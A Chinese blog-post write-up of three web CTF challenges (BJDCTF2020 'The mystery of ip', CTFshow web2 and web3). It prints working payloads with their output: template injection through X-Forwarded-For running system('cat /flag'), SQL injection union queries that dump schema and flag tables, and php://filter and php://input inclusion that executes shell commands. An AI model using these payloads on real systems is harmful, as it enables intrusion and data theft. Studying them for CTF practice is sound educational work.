ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

1.21

2022-01-21 23:02:44  阅读:205  来源: 互联网

标签:url 然后 flag 1.21 php payload schema


[BJDCTF2020]The mystery of ip

首先打开题目

 

有三个页面,一个index.php一个flag.php一个hint.php

只有第二个flag.php的页面有ip

 

然后ip就想到了X-Forwarded-For

于是直接用hackbar改x-forwarded-for

首先改成1试试

回显

Your IP is : 1 

然后改成1+1

回显

Your IP is : 1+1

然后改成{{1+1}}

结果回显

Your IP is : 2 

很明显是ssti服务器模板注入题目

直接payload:

X-Forwarded-For: {{system('ls /')}}

回显

Your IP is : bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var var 

说明ssti注入成功了,于是直接payload:

X-Forwarded-For: {{system('cat /flag')}}
Your IP is : flag{6a448c30-c2d5-4f57-9871-99a146e2d4a7}

 

 

CTFshowweb2

 

首先直接用户名admin然后密码采用' or 1=1#进行sql注入。

回显

 

说明注入成功了,存在sql漏洞

于是直接采用联合查询(因为这里是post方式提交,所以采用bp抓包进行修改传参)

payload:' union select 1,group_concat(schema_name),3 from information_schema.schemata#

爆出库的名字

information_schema,test,ctftraining,mysql,performance_schema,web2

然后再爆出表的名字:

payload:' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema like 'web2'#

然后得到:

flag,user

然后再爆出列的名字:

payload:' union select 1,group_concat(column_name),3 from information_schema.columns where table_name like 'flag'#

然后回显:

flag

然后可以payload:

payload:' union select 1,group_concat(flag),3 from web2.flag#

然后得到:ctfshow{51201966-2b6a-46be-9c65-eb6f63bb9435}

 

CTFshowweb3

 

首先打开题目只有这样一个,题目提示是说PHP伪协议

然后我先

payload:?url=php://filter/convert.base64-encode/resource=index.php

然后经过解码得到

<?php
error_reporting(0);
$url=$_GET['url'];
if(isset($url)){
  include($url);
}
   
?>
<?php
           
          $code="<?php include($"."_GET['url']);?>";
          highlight_string($code);
?>

然后并没有什么用处,然后我尝试采用:

payload:?url=php://input
并且同时post提交一个<?php system('ls');?>

然后得到了

ctf_go_go_go index.php 

于是然后提交一个<?php system('cat ctf_go_go_go');?>

得到了最终答案 ctfshow{9bb7e56e-4785-4ffe-91b9-a05e75014117}

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

标签:url,然后,flag,1.21,php,payload,schema
来源: https://www.cnblogs.com/FPointzero/p/15832074.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有